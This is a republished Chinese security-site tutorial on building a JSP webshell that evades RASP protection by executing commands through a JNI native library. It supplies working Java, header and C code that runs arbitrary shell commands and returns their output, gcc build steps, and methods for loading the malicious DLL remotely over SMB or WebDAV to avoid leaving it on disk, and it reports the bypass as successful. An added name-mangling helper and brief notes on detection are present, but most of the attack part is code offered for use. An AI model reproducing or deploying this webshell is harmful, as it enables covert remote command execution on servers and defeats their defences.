How to realize jsp webshell by bypassing rasp Protection with JNI Technology

2025-02-24 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 06/01 report

Today I will talk about how JNI can be used to bypass RASP protection and implement a JSP webshell. Many readers may not be familiar with the technique, so the editor has summarized it below; I hope you get something out of this article.

RASP products hook the Java (or PHP) runtime and make their decisions from the call stack observed at sensitive APIs, so they can be sidestepped with JNI. JNI is the part of the Java stack that lets Java code call functions written in C or C++. The idea is this: Tomcat compiles the JSP into a class file; that class calls a function exported by a DLL (or .so/.dylib) through JNI, and the native function executes the command and returns its output. Because the command never passes through Runtime.exec or ProcessBuilder, the blacklisted Java APIs that the RASP instruments are never called, which bypasses both the RASP and security software that watches those APIs.

Principle and use

Take the JSP webshell we are going to implement, test.jsp, as an example. JNI needs a C header (.h) generated by javah from a compiled .class file. A JSP is itself a special class: Tomcat compiles it following the naming convention test.jsp -> org.apache.jsp.test_jsp.class. To obtain a header with the right symbol names we therefore create a .java file whose package is org.apache.jsp and whose class is test_jsp, with the native method declared in an inner class:

```java
package org.apache.jsp;

public class test_jsp {
    class JniClass {
        public native String exec(String string);
    }
}
```

cd into the target/classes directory produced by the build and run `javah org.apache.jsp.test_jsp$JniClass` (quote the `$` in a shell so it is not expanded) to generate org_apache_jsp_test_jsp_JniClass.h. Note that javah was removed in JDK 10, so on newer JDKs such as the JDK 10 environment tested below the same header is produced with `javac -h <dir> test_jsp.java`. The header contains:

```c
/* DO NOT EDIT THIS FILE - it is machine generated */
#include <jni.h>
/* Header for class org_apache_jsp_test_jsp_JniClass */

#ifndef _Included_org_apache_jsp_test_jsp_JniClass
#define _Included_org_apache_jsp_test_jsp_JniClass
#ifdef __cplusplus
extern "C" {
#endif
/*
 * Class:     org_apache_jsp_test_jsp_JniClass
 * Method:    exec
 * Signature: (Ljava/lang/String;)Ljava/lang/String;
 */
JNIEXPORT jstring JNICALL Java_org_apache_jsp_test_1jsp_00024JniClass_exec
  (JNIEnv *, jobject, jstring);

#ifdef __cplusplus
}
#endif
#endif
```

Include the header generated in the previous step and write the C code that runs the command and returns its output to the caller:

```c
#include "jni.h"
#include "org_apache_jsp_test_jsp_JniClass.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* _popen/_pclose are the Windows names; POSIX (Linux, macOS) uses popen/pclose. */
#ifdef _WIN32
#define POPEN  _popen
#define PCLOSE _pclose
#else
#define POPEN  popen
#define PCLOSE pclose
#endif

#define RESULT_SIZE (1024 * 12)

/* Run cmd through the shell and append its stdout to result (capacity result_size).
 * Returns 1 on success, 0 if the pipe could not be opened. Output that does not fit
 * is dropped instead of overflowing the buffer, which would crash the whole JVM. */
int execmd(const char *cmd, char *result, size_t result_size)
{
    char buffer[128];
    FILE *pipe = POPEN(cmd, "r");                 /* open the pipe and execute the command */
    if (!pipe)
        return 0;                                 /* 0 indicates the command could not be run */
    while (fgets(buffer, sizeof buffer, pipe)) {  /* copy the pipe output into result */
        size_t used = strlen(result);
        if (used + 1 >= result_size)
            break;                                /* buffer full: stop reading */
        strncat(result, buffer, result_size - used - 1);
    }
    PCLOSE(pipe);                                 /* close the pipe */
    return 1;                                     /* 1 indicates successful execution */
}

JNIEXPORT jstring JNICALL
Java_org_apache_jsp_test_1jsp_00024JniClass_exec(JNIEnv *env, jobject this_object, jstring jstr)
{
    char result[RESULT_SIZE] = "";                /* string array holding the command output */
    const char *cstr = (*env)->GetStringUTFChars(env, jstr, NULL);
    if (cstr == NULL)
        return NULL;                              /* OutOfMemoryError is already pending */
    execmd(cstr, result, sizeof result);
    (*env)->ReleaseStringUTFChars(env, jstr, cstr);
    return (*env)->NewStringUTF(env, result);     /* hand the output back to the JSP */
}
```
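The exported symbol `Java_org_apache_jsp_test_1jsp_00024JniClass_exec` looks odd because of the JNI name-mangling rules: `_` in `test_jsp` becomes `_1`, and the `$` separating the inner class becomes `_00024`. The following C program, added here as an illustration and not part of the original article, derives the symbol name and the javah-style header file name from a Java class and method name. It is handy when javah is not available (it was removed in JDK 10) and you want to check a hand-written header, and on the defensive side when looking for `Java_org_apache_jsp_*` exports in a library on a Tomcat host. The function names are my own, and the code handles ASCII identifiers only; overloaded methods, whose symbols carry a `__` plus mangled signature suffix, are not covered.

```c
/* jni_mangle.c: derive the JNI symbol and header file name for a Java native method,
 * following the JNI spec's "Resolving Native Method Names" rules (ASCII identifiers only;
 * non-ASCII characters would need their UTF-16 code unit, which is not decoded here). */
#include <stdio.h>
#include <string.h>

/* Append src to out (capacity outsz) if it fits. Returns 0 on success, -1 if too small. */
static int append(char *out, size_t outsz, const char *src)
{
    size_t have = strlen(out), need = strlen(src);
    if (have + need + 1 > outsz)
        return -1;
    memcpy(out + have, src, need + 1);
    return 0;
}

static int is_ascii_alnum(unsigned char c)
{
    return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z');
}

/* Mangle one name (qualified class or method) per JNI: '.' or '/' -> '_', '_' -> '_1',
 * ';' -> '_2', '[' -> '_3', any other non-alphanumeric -> '_0XXXX' (lowercase hex). */
static int jni_mangle_part(const char *s, char *out, size_t outsz)
{
    char piece[8];
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (c >= 0x80)
            return -1;                       /* non-ASCII not supported in this example */
        if (c == '.' || c == '/')        strcpy(piece, "_");
        else if (c == '_')               strcpy(piece, "_1");
        else if (c == ';')               strcpy(piece, "_2");
        else if (c == '[')               strcpy(piece, "_3");
        else if (is_ascii_alnum(c))      { piece[0] = (char)c; piece[1] = '\0'; }
        else                             snprintf(piece, sizeof piece, "_0%04x", c);
        if (append(out, outsz, piece) != 0)
            return -1;
    }
    return 0;
}

/* Symbol the JVM looks up: Java_<mangled class>_<mangled method>. 0 on success, -1 on error. */
int jni_symbol(const char *qualified_class, const char *method, char *out, size_t outsz)
{
    if (outsz == 0)
        return -1;
    out[0] = '\0';
    if (append(out, outsz, "Java_") != 0)                   return -1;
    if (jni_mangle_part(qualified_class, out, outsz) != 0)  return -1;
    if (append(out, outsz, "_") != 0)                       return -1;
    return jni_mangle_part(method, out, outsz);
}

/* Header file name that javah / javac -h emit: '.' and '$' become '_', then ".h". */
int jni_header_name(const char *qualified_class, char *out, size_t outsz)
{
    size_t i, n = strlen(qualified_class);
    if (n + 3 > outsz)                   /* name + ".h" + NUL */
        return -1;
    for (i = 0; i < n; i++) {
        char c = qualified_class[i];
        out[i] = (c == '.' || c == '$') ? '_' : c;
    }
    memcpy(out + n, ".h", 3);
    return 0;
}

/* Convenience checks: 1 if the derived name equals expected, else 0. */
int jni_symbol_is(const char *cls, const char *method, const char *expected)
{
    char buf[256];
    return jni_symbol(cls, method, buf, sizeof buf) == 0 && strcmp(buf, expected) == 0;
}

int jni_header_is(const char *cls, const char *expected)
{
    char buf[256];
    return jni_header_name(cls, buf, sizeof buf) == 0 && strcmp(buf, expected) == 0;
}

int main(void)
{
    /* The article's own class and method names. */
    const char *cls = "org.apache.jsp.test_jsp$JniClass";
    char sym[256], hdr[256];
    if (jni_symbol(cls, "exec", sym, sizeof sym) == 0 && jni_header_name(cls, hdr, sizeof hdr) == 0)
        printf("%s\nJNIEXPORT jstring JNICALL %s(JNIEnv *, jobject, jstring);\n", hdr, sym);
    return 0;
}
```

Run stand-alone, the program prints the header file name and the prototype line that javah produced above, so the two can be compared directly.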

Use gcc to compile the C source into a DLL (or .so/.dylib). Build against JDK headers matching the target's JDK, and make sure the library's architecture (32- or 64-bit) matches the target JVM, otherwise System.load fails with an UnsatisfiedLinkError:

```shell
gcc -I"c:\Program Files\Java\jdk1.7.0_75\include" -I"c:\Program Files\Java\jdk1.7.0_75\include\win32" -shared JniClass.c -o 1.dll
```

There are two ways to load the library from the JSP. One is to place both the JSP and the DLL on the server and give System.load the absolute path (or a path derived from the web root) of the DLL in the JSP code. The other is to use a UNC path, so the malicious DLL is hosted remotely: nothing but the JSP lands on disk, tracing the source is harder, and the payload can be swapped without redeploying the JSP.

Technical key points

i. For Linux and macOS, the inner class generated above is named JniClass, so if the library is loaded with System.loadLibrary("JniClass") the file on disk must be libJniClass.so (Linux) or libJniClass.dylib (macOS; older JDKs used libJniClass.jnilib). System.load, by contrast, takes the full path to the file.

ii. System.load and System.loadLibrary wrap the path in a java.io.File, and System.load only accepts an absolute path. To load the library remotely you must first find out whether the target resolves `//host/share/...` or `\\host\share\...` paths; the simple test is `new File(path).exists()`. On Linux a leading `//` is just an ordinary path, so the payload (the .so/.jnilib) has to sit on an SMB share that is mounted on the target, for example an anonymous Samba share, and the mounted path is what gets loaded. On Windows the remote path starts with `\\` and the DLL is served from an SMB share; if outbound port 445 is blocked, Windows with the WebClient service running falls back to WebDAV over port 80 to fetch the DLL, which is then loaded and executed.

iii. The C/C++ code of the JNI payload must be robust: a crash in native code takes down the entire JVM on the target, not just one request.

iv. Executing commands through system()/popen() spawns a child shell process, which a HIDS watching process creation can still see even though the Java-level RASP hooks are bypassed. The bypass also depends on the RASP instrumenting only command-execution APIs such as Runtime.exec and ProcessBuilder; a RASP that additionally hooks System.load / System.loadLibrary will observe a JSP-compiled class loading a native library.

v. This webshell has only been tested on the Tomcat container.

Practical use

Tested environments: JDK 1.7 + Tomcat 8.5 + Windows, and JDK 10 + Tomcat + macOS.

RASP protection fully enabled (screenshot).

The sample index.jsp uses traditional Runtime.getRuntime().exec()-based command execution; as expected, it is logged and blocked by the RASP (screenshot).

The JNI-based JSP executes the shell command without being intercepted: bypass successful (screenshot).

D Shield scan result (screenshot).

VirusTotal result (screenshot).
